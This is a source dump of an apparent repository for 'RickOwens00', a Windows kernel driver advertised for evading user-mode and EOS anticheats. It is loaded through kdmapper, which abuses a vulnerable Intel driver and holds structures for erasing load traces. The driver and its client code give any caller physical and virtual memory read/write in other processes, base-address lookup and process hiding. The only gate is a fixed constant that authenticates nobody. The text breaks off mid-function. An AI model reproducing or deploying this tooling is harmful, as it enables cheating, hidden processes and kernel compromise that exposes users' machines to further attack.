├── kdmapper ├── service.hpp ├── kdmapper.hpp ├── portable_executable.hpp ├── utils.hpp ├── portable_executable.cpp ├── nt.hpp ├── utils.cpp ├── service.cpp ├── intel_driver.hpp ├── kdmapper.cpp └── intel_driver.cpp ├── project ├── driver.vcxproj.user ├── source │ ├── winver.h │ ├── entry.cpp │ └── definitions.h ├── driver.vcxproj.filters ├── driver.inf └── driver.vcxproj ├── README.md ├── Definitions.h ├── Communication.cpp ├── Communication.h └── raw_driver.h /kdmapper/service.hpp: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include 3 | 4 | namespace service 5 | { 6 | bool RegisterAndStart(const std::wstring& driver_path, const std::wstring& serviceName); 7 | bool StopAndRemove(const std::wstring& serviceName); 8 | }; -------------------------------------------------------------------------------- /project/driver.vcxproj.user: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | true 5 | 6 | -------------------------------------------------------------------------------- /kdmapper/kdmapper.hpp: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | #include "intel_driver.hpp" 5 | 6 | namespace kdmapper 7 | { 8 | enum class AllocationMode 9 | { 10 | AllocatePool, 11 | AllocateIndependentPages 12 | }; 13 | 14 | typedef bool (*mapCallback)(ULONG64* param1, ULONG64* param2, ULONG64 allocationPtr, ULONG64 allocationSize); 15 | 16 | //Note: if you set PassAllocationAddressAsFirstParam as true, param1 will be ignored 17 | ULONG64 MapDriver(HANDLE iqvw64e_device_handle, BYTE* data, ULONG64 param1 = 0, ULONG64 param2 = 0, bool free = false, bool destroyHeader = true, AllocationMode mode = AllocationMode::AllocatePool, bool PassAllocationAddressAsFirstParam = false, mapCallback callback = nullptr, NTSTATUS* exitCode = nullptr); 18 | } 
-------------------------------------------------------------------------------- /project/source/winver.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #define win_1803 17134 4 | #define win_1809 17763 5 | #define win_1903 18362 6 | #define win_1909 18363 7 | #define win_2004 19041 8 | #define win_20H2 19569 9 | #define win_21H1 20180 10 | #define win_22H2 19045 11 | 12 | // Returns the "user directory" offset for the running Windows build (an offset value, not a version number); unknown builds fall back to 0x0388 13 | SHORT get_windows_version() { 14 | RTL_OSVERSIONINFOW windows_version = {}; 15 | RtlGetVersion(&windows_version); 16 | 17 | switch (windows_version.dwBuildNumber) { 18 | case win_1803: 19 | case win_1809: 20 | return 0x0278; 21 | break; 22 | case win_1903: 23 | case win_1909: 24 | return 0x0280; 25 | break; 26 | case win_2004: 27 | case win_20H2: 28 | case win_21H1: 29 | case win_22H2: 30 | return 0x0388; 31 | break; 32 | default: 33 | return 0x0388; 34 | } 35 | } -------------------------------------------------------------------------------- /kdmapper/portable_executable.hpp: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include 3 | #include 4 | #include 5 | 6 | namespace portable_executable 7 | { 8 | struct RelocInfo 9 | { 10 | ULONG64 address; 11 | USHORT* item; 12 | ULONG32 count; 13 | }; 14 | 15 | struct ImportFunctionInfo 16 | { 17 | std::string name; 18 | ULONG64* address; 19 | }; 20 | 21 | struct ImportInfo 22 | { 23 | std::string module_name; 24 | std::vector function_datas; 25 | }; 26 | 27 | using vec_sections = std::vector; 28 | using vec_relocs = std::vector; 29 | using vec_imports = std::vector; 30 | 31 | PIMAGE_NT_HEADERS64 GetNtHeaders(void* image_base); 32 | vec_relocs GetRelocs(void* image_base); 33 | vec_imports GetImports(void* image_base); 34 | } -------------------------------------------------------------------------------- /kdmapper/utils.hpp: -------------------------------------------------------------------------------- 
1 | #pragma once 2 | 3 | #include 4 | #include 5 | #include 6 | #include 7 | 8 | #if defined(DISABLE_OUTPUT) 9 | #define Log(content) 10 | #else 11 | #define Log(content) std::wcout << content 12 | #endif 13 | 14 | namespace utils 15 | { 16 | std::wstring GetFullTempPath(); 17 | bool ReadFileToMemory(const std::wstring& file_path, std::vector* out_buffer); 18 | bool CreateFileFromMemory(const std::wstring& desired_file_path, const char* address, size_t size); 19 | uint64_t GetKernelModuleAddress(const std::string& module_name); 20 | BOOLEAN bDataCompare(const BYTE* pData, const BYTE* bMask, const char* szMask); 21 | uintptr_t FindPattern(uintptr_t dwAddress, uintptr_t dwLen, BYTE* bMask, const char* szMask); 22 | PVOID FindSection(const char* sectionName, uintptr_t modulePtr, PULONG size); 23 | std::wstring GetCurrentAppFolder(); 24 | } -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # RickOwens00 Driver 2 | 3 | ## discord: 359160088071766016 4 | 5 | ## Overview 6 | 7 | RickOwens00 is a kernel driver that works for UM anticheats and EOS anticheat. 
8 | 9 | --- 10 | 11 | ## IOCTL Definitions 12 | 13 | | IOCTL Name | Code | Description | 14 | |-------------------|-------------|------------------------------------------| 15 | | `PRW_CODE` | 0x2ec33 | Physical memory read/write | 16 | | `VRW_ATTACH_CODE` | 0x2ec34 | Attach to process for virtual memory RW | 17 | | `VRW_CODE` | 0x2ec35 | Virtual memory read/write | 18 | | `BA_CODE` | 0x2ec36 | Get process base address | 19 | | `GR_CODE` | 0x2ec37 | Get guarded memory region | 20 | | `HF_CODE` | 0x2ec38 | Unlink a process from active list | 21 | | `SECURITY_CODE` | 0x94c9e4bc3 | Required for all valid requests | 22 | Note: the `Code` column lists the function argument passed to `CTL_CODE`, not the composed control code; these values exceed the 12-bit function field (maximum 0xFFF), so their high bits spill into the access and device-type fields of the code that actually reaches the driver. `SECURITY_CODE` is not an IOCTL: it is a fixed constant the client writes into the security-code field of a request, so it marks the protocol and does not authenticate the caller. 23 | --- 24 | -------------------------------------------------------------------------------- /Definitions.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include 3 | #include 4 | #include 5 | 6 | #define PRW_CODE CTL_CODE(FILE_DEVICE_UNKNOWN, 0x2ec33, METHOD_BUFFERED, FILE_SPECIAL_ACCESS) 7 | #define VRW_ATTACH_CODE CTL_CODE(FILE_DEVICE_UNKNOWN, 0x2ec34, METHOD_BUFFERED, FILE_SPECIAL_ACCESS) 8 | #define VRW_CODE CTL_CODE(FILE_DEVICE_UNKNOWN, 0x2ec35, METHOD_BUFFERED, FILE_SPECIAL_ACCESS) 9 | #define BA_CODE CTL_CODE(FILE_DEVICE_UNKNOWN, 0x2ec36, METHOD_BUFFERED, FILE_SPECIAL_ACCESS) 10 | #define SECURITY_CODE 0x94c9e4bc3 11 | 12 | #define sleep_ms(ms) std::this_thread::sleep_for(std::chrono::milliseconds(ms)) 13 | 14 | typedef char i8; 15 | typedef short i16; 16 | typedef int i32; 17 | typedef long long i64; 18 | 19 | typedef unsigned char u8; 20 | typedef unsigned short u16; 21 | typedef unsigned int u32; 22 | typedef unsigned long long u64; 23 | 24 | typedef float f32; 25 | typedef double f64; 26 | 27 | typedef const char* cstr; 28 | typedef std::string str; 29 | 30 | struct _PRW { 31 | u64 securityCode; 32 | 33 | i32 processId; 34 | void* address; 35 | void* buffer; 36 | 37 | u64 size; 38 | u64 returnSize; 39 | 40 | bool type; 41 | }; 42 | 43 | struct _VRW { 44 | u64 securityCode; 45 | 46 | 
HANDLE processHandle; 47 | void* address; 48 | void* buffer; 49 | 50 | u64 size; 51 | u64 returnSize; 52 | 53 | bool type; 54 | }; 55 | 56 | struct _BA { 57 | u64 securityCode; 58 | 59 | i32 processId; 60 | u64* address; 61 | }; 62 | -------------------------------------------------------------------------------- /project/source/entry.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include "definitions.h" 3 | 4 | NTSTATUS driver_initialize(PDRIVER_OBJECT driver_object, PUNICODE_STRING registry_path) { 5 | UNREFERENCED_PARAMETER(registry_path); 6 | 7 | NTSTATUS status = STATUS_UNSUCCESSFUL; 8 | 9 | UNICODE_STRING device_name = {}; 10 | RtlInitUnicodeString(&device_name, DEVICE_NAME); 11 | 12 | PDEVICE_OBJECT device_object = nullptr; 13 | 14 | status = IoCreateDevice(driver_object, NULL, &device_name, FILE_DEVICE_UNKNOWN, FILE_DEVICE_SECURE_OPEN, FALSE, &device_object); 15 | if (!NT_SUCCESS(status)) return status; 16 | 17 | UNICODE_STRING symbolic_link = {}; 18 | RtlInitUnicodeString(&symbolic_link, SYMBOLIC_LINK); 19 | 20 | status = IoCreateSymbolicLink(&symbolic_link, &device_name); 21 | if (!NT_SUCCESS(status)) return status; 22 | 23 | SetFlag(device_object->Flags, DO_BUFFERED_IO); 24 | 25 | driver_object->MajorFunction[IRP_MJ_CREATE] = major_functions::dispatcher; 26 | driver_object->MajorFunction[IRP_MJ_CLOSE] = major_functions::dispatcher; 27 | driver_object->MajorFunction[IRP_MJ_DEVICE_CONTROL] = major_functions::io_controller; 28 | driver_object->DriverUnload = nullptr; 29 | 30 | ClearFlag(device_object->Flags, DO_DIRECT_IO); 31 | ClearFlag(device_object->Flags, DO_DEVICE_INITIALIZING); 32 | 33 | return STATUS_SUCCESS; 34 | } 35 | 36 | NTSTATUS DriverEntry() { 37 | UNICODE_STRING driver_name = {}; 38 | RtlInitUnicodeString(&driver_name, DRIVER_NAME); 39 | 40 | return IoCreateDriver(&driver_name, &driver_initialize); 41 | } -------------------------------------------------------------------------------- 
/project/driver.vcxproj.filters: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | {8E41214B-6785-4CFE-B992-037D68949A14} 18 | inf;inv;inx;mof;mc; 19 | 20 | 21 | 22 | 23 | Driver Files 24 | 25 | 26 | 27 | 28 | Source Files 29 | 30 | 31 | 32 | 33 | Header Files 34 | 35 | 36 | Header Files 37 | 38 | 39 | -------------------------------------------------------------------------------- /project/driver.inf: -------------------------------------------------------------------------------- 1 | ; 2 | ; driver.inf 3 | ; 4 | 5 | [Version] 6 | Signature = "$WINDOWS NT$" 7 | Class = System ; TODO: specify appropriate Class 8 | ClassGuid = {4d36e97d-e325-11ce-bfc1-08002be10318} ; TODO: specify appropriate ClassGuid 9 | Provider = %ManufacturerName% 10 | CatalogFile = driver.cat 11 | DriverVer = ; TODO: set DriverVer in stampinf property pages 12 | PnpLockdown = 1 13 | 14 | [DestinationDirs] 15 | DefaultDestDir = 13 16 | 17 | [SourceDisksNames] 18 | 1 = %DiskName%,,,"" 19 | 20 | [SourceDisksFiles] 21 | driver.sys = 1,, 22 | 23 | ;***************************************** 24 | ; Install Section 25 | ;***************************************** 26 | 27 | [Manufacturer] 28 | %ManufacturerName% = Standard,NT$ARCH$.10.0...16299 ; %13% support introduced in build 16299 29 | 30 | [Standard.NT$ARCH$.10.0...16299] 31 | %driver.DeviceDesc% = driver_Device, Root\driver ; TODO: edit hw-id 32 | 33 | [driver_Device.NT] 34 | CopyFiles = File_Copy 35 | 36 | [File_Copy] 37 | driver.sys 38 | 39 | ;-------------- Service installation 40 | [driver_Device.NT.Services] 41 | AddService = driver,%SPSVCINST_ASSOCSERVICE%, 
driver_Service_Inst 42 | 43 | ; -------------- driver driver install sections 44 | [driver_Service_Inst] 45 | DisplayName = %driver.SVCDESC% 46 | ServiceType = 1 ; SERVICE_KERNEL_DRIVER 47 | StartType = 3 ; SERVICE_DEMAND_START 48 | ErrorControl = 1 ; SERVICE_ERROR_NORMAL 49 | ServiceBinary = %13%\driver.sys 50 | 51 | [driver_Device.NT.Wdf] 52 | KmdfService = driver, driver_wdfsect 53 | 54 | [driver_wdfsect] 55 | KmdfLibraryVersion = $KMDFVERSION$ 56 | 57 | [Strings] 58 | SPSVCINST_ASSOCSERVICE = 0x00000002 59 | ManufacturerName = "" ;TODO: Replace with your manufacturer name 60 | DiskName = "driver Installation Disk" 61 | driver.DeviceDesc = "driver Device" 62 | driver.SVCDESC = "driver Service" 63 | -------------------------------------------------------------------------------- /Communication.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | communication::communication() { 4 | driver_handle = CreateFileA("\\\\.\\RickOwens00", GENERIC_READ | GENERIC_WRITE, 5 | FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL); 6 | } 7 | 8 | communication::~communication() { 9 | if (driver_handle != INVALID_HANDLE_VALUE) { 10 | CloseHandle(driver_handle); 11 | } 12 | } 13 | 14 | bool communication::is_connected() { 15 | return (driver_handle != INVALID_HANDLE_VALUE); 16 | } 17 | 18 | bool communication::v_attach(i32 process_id) { 19 | _VRW arguments; 20 | arguments.process_handle = reinterpret_cast(process_id); 21 | 22 | return DeviceIoControl(driver_handle, VRW_ATTACH_CODE, &arguments, sizeof(arguments), &arguments, sizeof(arguments), nullptr, nullptr); 23 | } 24 | 25 | std::string communication::readstr(u64 address) { 26 | i32 StrLength = read(address + 0x18); 27 | 28 | if (StrLength >= 16) { 29 | address = read(address); 30 | } 31 | 32 | std::vector Buffer(256); 33 | 34 | _PRW arguments = {}; 35 | arguments.security_code = SECURITY_CODE; 36 | arguments.address = reinterpret_cast(address); 37 | 
arguments.buffer = Buffer.data(); 38 | arguments.size = Buffer.size(); 39 | arguments.process_id = process_id; 40 | arguments.Type = false; 41 | 42 | DeviceIoControl(driver_handle, PRW_CODE, &arguments, sizeof(arguments), nullptr, NULL, NULL, NULL); 43 | 44 | return std::string(Buffer.data()); 45 | } 46 | 47 | i32 communication::find_process(const i8* process_name) { 48 | PROCESSENTRY32 process_entry = {}; 49 | process_entry.dwSize = sizeof(PROCESSENTRY32); 50 | 51 | HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); 52 | if (snapshot == INVALID_HANDLE_VALUE) { 53 | return 0; 54 | } 55 | 56 | if (Process32First(snapshot, &process_entry)) { 57 | do { 58 | if (_stricmp(process_entry.szExeFile, process_name) == 0) { 59 | process_id = process_entry.th32ProcessID; 60 | break; 61 | } 62 | } while (Process32Next(snapshot, &process_entry)); 63 | } 64 | 65 | CloseHandle(snapshot); 66 | 67 | return process_id; 68 | } 69 | 70 | u64 communication::find_image() { 71 | u64 image_address = 0; 72 | _BA arguments = {}; 73 | arguments.security_code = SECURITY_CODE; 74 | arguments.process_id = process_id; 75 | arguments.address = &image_address; 76 | 77 | DeviceIoControl(driver_handle, BA_CODE, &arguments, sizeof(arguments), nullptr, NULL, NULL, NULL); 78 | 79 | communication::image_address = image_address; 80 | 81 | return image_address; 82 | } 83 | -------------------------------------------------------------------------------- /Communication.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include 3 | #include 4 | #include 5 | #include 6 | 7 | #include 8 | 9 | #define PRW_CODE CTL_CODE(FILE_DEVICE_UNKNOWN, 0x2ec33, METHOD_BUFFERED, FILE_SPECIAL_ACCESS) 10 | #define VRW_ATTACH_CODE CTL_CODE(FILE_DEVICE_UNKNOWN, 0x2ec34, METHOD_BUFFERED, FILE_SPECIAL_ACCESS) 11 | #define VRW_CODE CTL_CODE(FILE_DEVICE_UNKNOWN, 0x2ec35, METHOD_BUFFERED, FILE_SPECIAL_ACCESS) 12 | #define BA_CODE CTL_CODE(FILE_DEVICE_UNKNOWN, 
0x2ec36, METHOD_BUFFERED, FILE_SPECIAL_ACCESS) 13 | #define SECURITY_CODE 0x94c9e4bc3 14 | 15 | struct _PRW { 16 | u64 security_code; 17 | 18 | i32 process_id; 19 | void* address; 20 | void* buffer; 21 | 22 | u64 size; 23 | u64 return_size; 24 | 25 | bool Type; 26 | }; 27 | 28 | struct _VRW { 29 | u64 security_code; 30 | 31 | HANDLE process_handle; 32 | void* address; 33 | void* buffer; 34 | 35 | u64 size; 36 | u64 return_size; 37 | 38 | bool Type; 39 | }; 40 | 41 | struct _BA { 42 | u64 security_code; 43 | 44 | i32 process_id; 45 | u64* address; 46 | }; 47 | 48 | class communication { 49 | public: 50 | communication(); 51 | ~communication(); 52 | 53 | bool is_connected(); 54 | 55 | bool v_attach(i32 process_id); 56 | 57 | i32 find_process(const i8* ProcessName); // UM 58 | u64 find_image(); 59 | 60 | template 61 | T v_read(u64 address); 62 | template 63 | void v_write(u64 address, T& Value); 64 | 65 | template 66 | T read(u64 address); 67 | template 68 | void write(u64 address, T& Value); 69 | 70 | std::string readstr(u64 address); 71 | 72 | u64 image_address = 0; 73 | i32 process_id = 0; 74 | private: 75 | HANDLE driver_handle = INVALID_HANDLE_VALUE; 76 | }; 77 | 78 | template 79 | T communication::v_read(u64 address) { 80 | T temp = {}; 81 | 82 | _VRW arguments; 83 | arguments.security_code = SECURITY_CODE; 84 | arguments.address = reinterpret_cast(address); 85 | arguments.buffer = &temp; 86 | arguments.size = sizeof(T); 87 | arguments.Type = false; 88 | 89 | DeviceIoControl(driver_handle, VRW_CODE, &arguments, sizeof(arguments), &arguments, sizeof(arguments), nullptr, nullptr); 90 | return temp; 91 | } 92 | 93 | template 94 | void communication::v_write(u64 address, T& value) { 95 | _VRW arguments; 96 | arguments.security_code = SECURITY_CODE; 97 | arguments.address = reinterpret_cast(address); 98 | arguments.buffer = (void*)&value; 99 | arguments.size = sizeof(T); 100 | arguments.Type = true; 101 | 102 | DeviceIoControl(driver_handle, VRW_CODE, &arguments, 
sizeof(arguments), &arguments, sizeof(arguments), nullptr, nullptr); 103 | } 104 | 105 | template 106 | T communication::read(u64 address) { 107 | T temp = {}; 108 | 109 | _PRW arguments = {}; 110 | arguments.security_code = SECURITY_CODE; 111 | arguments.address = reinterpret_cast(address); 112 | arguments.buffer = &temp; 113 | arguments.size = sizeof(T); 114 | arguments.process_id = process_id; 115 | arguments.Type = false; 116 | 117 | DeviceIoControl(driver_handle, PRW_CODE, &arguments, sizeof(arguments), nullptr, NULL, NULL, NULL); 118 | 119 | return temp; 120 | } 121 | 122 | template 123 | void communication::write(u64 address, T& value) { 124 | _PRW arguments = {}; 125 | arguments.security_code = SECURITY_CODE; 126 | arguments.address = reinterpret_cast(address); 127 | arguments.buffer = (void*)&value; 128 | arguments.size = sizeof(T); 129 | arguments.process_id = process_id; 130 | arguments.Type = true; 131 | 132 | DeviceIoControl(driver_handle, PRW_CODE, &arguments, sizeof(arguments), nullptr, NULL, NULL, NULL); 133 | } 134 | -------------------------------------------------------------------------------- /kdmapper/portable_executable.cpp: -------------------------------------------------------------------------------- 1 | #include "portable_executable.hpp" 2 | 3 | #include 4 | #include 5 | 6 | 7 | PIMAGE_NT_HEADERS64 portable_executable::GetNtHeaders(void* image_base) { 8 | const auto dos_header = reinterpret_cast(image_base); 9 | 10 | if (dos_header->e_magic != IMAGE_DOS_SIGNATURE) 11 | return nullptr; 12 | 13 | const auto nt_headers = reinterpret_cast(reinterpret_cast(image_base) + dos_header->e_lfanew); 14 | 15 | if (nt_headers->Signature != IMAGE_NT_SIGNATURE) 16 | return nullptr; 17 | 18 | return nt_headers; 19 | } 20 | 21 | portable_executable::vec_relocs portable_executable::GetRelocs(void* image_base) { 22 | const PIMAGE_NT_HEADERS64 nt_headers = GetNtHeaders(image_base); 23 | 24 | if (!nt_headers) 25 | return {}; 26 | 27 | vec_relocs relocs; 28 | 
DWORD reloc_va = nt_headers->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress; 29 | 30 | if (!reloc_va) //Fix from @greetmark of UnknownCheats Forum 31 | return {}; 32 | 33 | auto current_base_relocation = reinterpret_cast(reinterpret_cast(image_base) + reloc_va); 34 | const auto reloc_end = reinterpret_cast(reinterpret_cast(current_base_relocation) + nt_headers->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].Size); 35 | 36 | while (current_base_relocation < reloc_end && current_base_relocation->SizeOfBlock) { 37 | RelocInfo reloc_info; 38 | 39 | reloc_info.address = reinterpret_cast(image_base) + current_base_relocation->VirtualAddress; 40 | reloc_info.item = reinterpret_cast(reinterpret_cast(current_base_relocation) + sizeof(IMAGE_BASE_RELOCATION)); 41 | reloc_info.count = (current_base_relocation->SizeOfBlock - sizeof(IMAGE_BASE_RELOCATION)) / sizeof(USHORT); 42 | 43 | relocs.push_back(reloc_info); 44 | 45 | current_base_relocation = reinterpret_cast(reinterpret_cast(current_base_relocation) + current_base_relocation->SizeOfBlock); 46 | } 47 | 48 | return relocs; 49 | } 50 | 51 | portable_executable::vec_imports portable_executable::GetImports(void* image_base) { 52 | const PIMAGE_NT_HEADERS64 nt_headers = GetNtHeaders(image_base); 53 | 54 | if (!nt_headers) 55 | return {}; 56 | 57 | DWORD import_va = nt_headers->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress; 58 | 59 | //not imports necesary 60 | if (!import_va) 61 | return {}; 62 | 63 | vec_imports imports; 64 | 65 | auto current_import_descriptor = reinterpret_cast(reinterpret_cast(image_base) + import_va); 66 | 67 | while (current_import_descriptor->FirstThunk) { 68 | ImportInfo import_info; 69 | 70 | import_info.module_name = std::string(reinterpret_cast(reinterpret_cast(image_base) + current_import_descriptor->Name)); 71 | 72 | auto current_first_thunk = reinterpret_cast(reinterpret_cast(image_base) + 
current_import_descriptor->FirstThunk); 73 | auto current_originalFirstThunk = reinterpret_cast(reinterpret_cast(image_base) + current_import_descriptor->OriginalFirstThunk); 74 | 75 | while (current_originalFirstThunk->u1.Function) { 76 | ImportFunctionInfo import_function_data; 77 | 78 | auto thunk_data = reinterpret_cast(reinterpret_cast(image_base) + current_originalFirstThunk->u1.AddressOfData); 79 | 80 | import_function_data.name = thunk_data->Name; 81 | import_function_data.address = ¤t_first_thunk->u1.Function; 82 | 83 | import_info.function_datas.push_back(import_function_data); 84 | 85 | ++current_originalFirstThunk; 86 | ++current_first_thunk; 87 | } 88 | 89 | imports.push_back(import_info); 90 | ++current_import_descriptor; 91 | } 92 | 93 | return imports; 94 | } -------------------------------------------------------------------------------- /kdmapper/nt.hpp: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include 3 | #include 4 | #pragma comment(lib, "ntdll.lib") 5 | 6 | namespace nt 7 | { 8 | constexpr auto STATUS_INFO_LENGTH_MISMATCH = 0xC0000004; 9 | 10 | constexpr auto SystemModuleInformation = 11; 11 | constexpr auto SystemExtendedHandleInformation = 64; 12 | 13 | extern "C" NTSTATUS NtLoadDriver(PUNICODE_STRING DriverServiceName); 14 | extern "C" NTSTATUS NtUnloadDriver(PUNICODE_STRING DriverServiceName); 15 | extern "C" NTSTATUS RtlAdjustPrivilege(ULONG Privilege, BOOLEAN Enable, BOOLEAN Client, BOOLEAN* WasEnabled); 16 | 17 | 18 | typedef struct _SYSTEM_HANDLE 19 | { 20 | PVOID Object; 21 | HANDLE UniqueProcessId; 22 | HANDLE HandleValue; 23 | ULONG GrantedAccess; 24 | USHORT CreatorBackTraceIndex; 25 | USHORT ObjectTypeIndex; 26 | ULONG HandleAttributes; 27 | ULONG Reserved; 28 | } SYSTEM_HANDLE, *PSYSTEM_HANDLE; 29 | 30 | typedef struct _SYSTEM_HANDLE_INFORMATION_EX 31 | { 32 | ULONG_PTR HandleCount; 33 | ULONG_PTR Reserved; 34 | SYSTEM_HANDLE Handles[1]; 35 | } 
SYSTEM_HANDLE_INFORMATION_EX, *PSYSTEM_HANDLE_INFORMATION_EX; 36 | 37 | //Thanks to Pvt Comfy for remember to update this https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/wdm/ne-wdm-_pool_type 38 | typedef enum class _POOL_TYPE { 39 | NonPagedPool, 40 | NonPagedPoolExecute = NonPagedPool, 41 | PagedPool, 42 | NonPagedPoolMustSucceed = NonPagedPool + 2, 43 | DontUseThisType, 44 | NonPagedPoolCacheAligned = NonPagedPool + 4, 45 | PagedPoolCacheAligned, 46 | NonPagedPoolCacheAlignedMustS = NonPagedPool + 6, 47 | MaxPoolType, 48 | NonPagedPoolBase = 0, 49 | NonPagedPoolBaseMustSucceed = NonPagedPoolBase + 2, 50 | NonPagedPoolBaseCacheAligned = NonPagedPoolBase + 4, 51 | NonPagedPoolBaseCacheAlignedMustS = NonPagedPoolBase + 6, 52 | NonPagedPoolSession = 32, 53 | PagedPoolSession = NonPagedPoolSession + 1, 54 | NonPagedPoolMustSucceedSession = PagedPoolSession + 1, 55 | DontUseThisTypeSession = NonPagedPoolMustSucceedSession + 1, 56 | NonPagedPoolCacheAlignedSession = DontUseThisTypeSession + 1, 57 | PagedPoolCacheAlignedSession = NonPagedPoolCacheAlignedSession + 1, 58 | NonPagedPoolCacheAlignedMustSSession = PagedPoolCacheAlignedSession + 1, 59 | NonPagedPoolNx = 512, 60 | NonPagedPoolNxCacheAligned = NonPagedPoolNx + 4, 61 | NonPagedPoolSessionNx = NonPagedPoolNx + 32, 62 | } POOL_TYPE; 63 | 64 | typedef struct _RTL_PROCESS_MODULE_INFORMATION 65 | { 66 | HANDLE Section; 67 | PVOID MappedBase; 68 | PVOID ImageBase; 69 | ULONG ImageSize; 70 | ULONG Flags; 71 | USHORT LoadOrderIndex; 72 | USHORT InitOrderIndex; 73 | USHORT LoadCount; 74 | USHORT OffsetToFileName; 75 | UCHAR FullPathName[256]; 76 | } RTL_PROCESS_MODULE_INFORMATION, *PRTL_PROCESS_MODULE_INFORMATION; 77 | 78 | typedef struct _RTL_PROCESS_MODULES 79 | { 80 | ULONG NumberOfModules; 81 | RTL_PROCESS_MODULE_INFORMATION Modules[1]; 82 | } RTL_PROCESS_MODULES, *PRTL_PROCESS_MODULES; 83 | 84 | typedef struct _HashBucketEntry 85 | { 86 | struct _HashBucketEntry* Next; 87 | UNICODE_STRING DriverName; 
88 | ULONG CertHash[5]; 89 | } HashBucketEntry, * PHashBucketEntry; 90 | 91 | 92 | typedef struct _RTL_BALANCED_LINKS { 93 | struct _RTL_BALANCED_LINKS* Parent; 94 | struct _RTL_BALANCED_LINKS* LeftChild; 95 | struct _RTL_BALANCED_LINKS* RightChild; 96 | CHAR Balance; 97 | UCHAR Reserved[3]; 98 | } RTL_BALANCED_LINKS; 99 | typedef RTL_BALANCED_LINKS* PRTL_BALANCED_LINKS; 100 | 101 | typedef struct _RTL_AVL_TABLE { 102 | RTL_BALANCED_LINKS BalancedRoot; 103 | PVOID OrderedPointer; 104 | ULONG WhichOrderedElement; 105 | ULONG NumberGenericTableElements; 106 | ULONG DepthOfTree; 107 | PVOID RestartKey; 108 | ULONG DeleteCount; 109 | PVOID CompareRoutine; 110 | PVOID AllocateRoutine; 111 | PVOID FreeRoutine; 112 | PVOID TableContext; 113 | } RTL_AVL_TABLE; 114 | typedef RTL_AVL_TABLE* PRTL_AVL_TABLE; 115 | 116 | typedef struct _PiDDBCacheEntry 117 | { 118 | LIST_ENTRY List; 119 | UNICODE_STRING DriverName; 120 | ULONG TimeDateStamp; 121 | NTSTATUS LoadStatus; 122 | char _0x0028[16]; // data from the shim engine, or uninitialized memory for custom drivers 123 | } PiDDBCacheEntry, * NPiDDBCacheEntry; 124 | } 125 | -------------------------------------------------------------------------------- /kdmapper/utils.cpp: -------------------------------------------------------------------------------- 1 | #include "utils.hpp" 2 | #include 3 | #include 4 | #include 5 | #include 6 | 7 | #include "nt.hpp" 8 | 9 | std::wstring utils::GetFullTempPath() { 10 | wchar_t temp_directory[MAX_PATH + 1] = { 0 }; 11 | const uint32_t get_temp_path_ret = GetTempPathW(sizeof(temp_directory) / 2, temp_directory); 12 | if (!get_temp_path_ret || get_temp_path_ret > MAX_PATH + 1) { 13 | Log(L"[-] Failed to get temp path" << std::endl); 14 | return L""; 15 | } 16 | if (temp_directory[wcslen(temp_directory) - 1] == L'\\') 17 | temp_directory[wcslen(temp_directory) - 1] = 0x0; 18 | 19 | return std::wstring(temp_directory); 20 | } 21 | 22 | bool utils::ReadFileToMemory(const std::wstring& file_path, 
std::vector* out_buffer) { 23 | std::ifstream file_ifstream(file_path, std::ios::binary); 24 | 25 | if (!file_ifstream) 26 | return false; 27 | 28 | out_buffer->assign((std::istreambuf_iterator(file_ifstream)), std::istreambuf_iterator()); 29 | file_ifstream.close(); 30 | 31 | return true; 32 | } 33 | 34 | bool utils::CreateFileFromMemory(const std::wstring& desired_file_path, const char* address, size_t size) { 35 | std::ofstream file_ofstream(desired_file_path.c_str(), std::ios_base::out | std::ios_base::binary); 36 | 37 | if (!file_ofstream.write(address, size)) { 38 | file_ofstream.close(); 39 | return false; 40 | } 41 | 42 | file_ofstream.close(); 43 | return true; 44 | } 45 | 46 | uint64_t utils::GetKernelModuleAddress(const std::string& module_name) { 47 | void* buffer = nullptr; 48 | DWORD buffer_size = 0; 49 | 50 | NTSTATUS status = NtQuerySystemInformation(static_cast(nt::SystemModuleInformation), buffer, buffer_size, &buffer_size); 51 | 52 | while (status == nt::STATUS_INFO_LENGTH_MISMATCH) { 53 | if (buffer != nullptr) 54 | VirtualFree(buffer, 0, MEM_RELEASE); 55 | 56 | buffer = VirtualAlloc(nullptr, buffer_size, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); 57 | status = NtQuerySystemInformation(static_cast(nt::SystemModuleInformation), buffer, buffer_size, &buffer_size); 58 | } 59 | 60 | if (!NT_SUCCESS(status)) { 61 | if (buffer != nullptr) 62 | VirtualFree(buffer, 0, MEM_RELEASE); 63 | return 0; 64 | } 65 | 66 | const auto modules = static_cast(buffer); 67 | if (!modules) 68 | return 0; 69 | 70 | for (auto i = 0u; i < modules->NumberOfModules; ++i) { 71 | const std::string current_module_name = std::string(reinterpret_cast(modules->Modules[i].FullPathName) + modules->Modules[i].OffsetToFileName); 72 | 73 | if (!_stricmp(current_module_name.c_str(), module_name.c_str())) 74 | { 75 | const uint64_t result = 